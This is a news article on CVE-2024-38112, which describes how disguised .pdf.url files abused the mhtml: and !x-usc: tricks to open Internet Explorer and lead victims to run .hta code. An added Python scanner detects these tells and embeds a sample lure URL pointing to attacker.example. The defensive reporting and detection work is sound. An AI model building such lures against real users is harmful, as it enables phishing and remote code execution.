Attackers launched zero-day attacks targeting Windows users with malware for more than a year before Microsoft patched the vulnerability that made it possible, researchers said Tuesday.
The vulnerability, which is present in both Windows 10 and 11, causes devices to open Internet Explorer, a legacy browser that Microsoft retired in 2022 after its outdated codebase made it increasingly susceptible to exploits. Following the move, Windows made it difficult, if not impossible, to open the browser, which was first introduced in the mid-1990s.
Old and new tricks
Malicious code exploiting the vulnerability dates back to at least January 2023 and was circulating as recently as May of this year, according to the researchers who discovered and reported the vulnerability to Microsoft. The company patched the vulnerability, tracked as CVE-2024-38112, on Tuesday as part of its monthly patch release program. The vulnerability, which was in Windows’ MSHTML engine, had a severity rating of 7.0 out of 10.
According to researchers at security firm Check Point, the attack code “executed new (or previously unknown) tricks to lure Windows users into remote code execution.” A link that appeared to open a PDF file added a .url extension to the end of the file, for example Books_A0UJKO.pdf.url, found in one of the malicious code samples.
When viewed in Windows, the file displayed an icon indicating that the file was a PDF rather than a .url file. Such files are designed to open an application specified in a link.
A link in the file called msedge.exe, a file that executes Edge. However, the link contained two attributes: mhtml: and !x-usc:, an “old trick” that attackers have been using for years to trick Windows applications like MS Word into opening. It also contained a link to a malicious website. When clicked, the .url file, disguised as a PDF, opened the site, not in Edge, but in Internet Explorer.
“From there (the website opened with IE) the attacker can do a lot of bad things, because IE is insecure and outdated,” wrote Haifei Li, the Check Point researcher who discovered the vulnerability. “For example, if the attacker has an IE zero-day exploit, which is much easier to find than Chrome/Edge, the attacker can target the victim to achieve remote code execution immediately. However, in the samples we analyzed, the threat actors did not use any IE remote code execution exploit. Instead, they used another trick in IE, which was probably not publicly known before, as far as we know, to trick the victim into achieving remote code execution.”
IE would then present the user with a dialog box asking if they wanted to open the file masquerading as a PDF. If the user clicked “open,” Windows would present a second dialog box with a vague message that proceeding would open content on the Windows device. If the user clicked “allow,” IE would load a file ending in .hta, an extension that causes Windows to open the file in Internet Explorer and execute embedded code.
“To summarize the attacks from an exploitation perspective, the first technique used in these campaigns is the ‘mhtml’ trick, which allows the attacker to invoke IE instead of the more secure Chrome/Edge,” Li wrote. “The second technique is an IE trick to trick the victim into believing that they are opening a PDF file, when in fact they are downloading and executing a malicious .hta application. The overall goal of these attacks is to trick the victim into believing that they are opening a PDF file, and this is achieved by using these two tricks.”
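The two file-level tells described above (a document extension hidden in front of .url, and a URL field carrying the mhtml: prefix and !x-usc: redirector) can be checked with a small scanner. This is an added example, not code from Check Point or the article; the .url contents and the host attacker.example are constructed for the demo.

```python
import configparser
from pathlib import PurePath

# Constructed sample .url files for the scanner to inspect. They are not the
# samples from the Check Point report; attacker.example is a placeholder host.
SAMPLES = {
    "Books_A0UJKO.pdf.url":
        "[InternetShortcut]\n"
        "URL=mhtml:http://attacker.example/p.html!x-usc:http://attacker.example/p.html\n",
    "Docs.url":
        "[InternetShortcut]\n"
        "URL=https://docs.example/\n",
}

# Extensions a lure would want the victim to believe they are opening.
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}


def scan_url_file(name: str, text: str) -> list[str]:
    """Return the reasons a .url file resembles the CVE-2024-38112 lure."""
    findings = []
    suffixes = PurePath(name).suffixes
    # Double extension such as .pdf.url: Explorer shows the document icon.
    if (len(suffixes) >= 2 and suffixes[-1].lower() == ".url"
            and suffixes[-2].lower() in DOC_EXTS):
        findings.append("document extension hidden before .url: "
                        + "".join(suffixes[-2:]))
    # .url files are INI-style; interpolation=None keeps '%' in URLs literal.
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    url = cp.get("InternetShortcut", "URL", fallback="").lower()
    if url.startswith("mhtml:"):
        findings.append("mhtml: prefix hands the link to the MSHTML/IE handler")
    if "!x-usc:" in url:
        findings.append("!x-usc: redirector inside the URL")
    return findings


def scan_all(samples: dict = SAMPLES) -> dict:
    """Scan every sample and map file name to its list of findings."""
    return {name: scan_url_file(name, text) for name, text in samples.items()}


if __name__ == "__main__":
    for name, findings in scan_all().items():
        print(name, "->", findings or ["clean"])
```

Point the scanner at the .url files found in user download and mail attachment folders; a hit on either URL check is worth triage even without a double extension.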
The Check Point post contains cryptographic hashes for six malicious .url files used in the campaign. Windows users can use the hashes to check if they have been targeted.